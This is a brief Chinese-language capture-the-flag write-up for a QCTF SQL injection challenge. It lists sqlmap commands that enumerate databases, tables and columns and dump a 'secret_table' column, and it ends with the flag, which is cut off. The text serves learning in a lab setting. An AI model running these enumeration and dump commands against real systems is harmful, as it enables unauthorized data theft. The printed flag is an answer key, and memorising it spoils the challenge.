打开环境

有查询，猜测是sql注入

保存请求头到文件中

准备利用sqlmap

查找数据库

python sqlmap.py -r ./123.txt --dbs

查找表

python sqlmap.py -r ./123.txt --tables -D news

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

显示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

得到flag

QCTF{sq1_inJec7ion_ezzz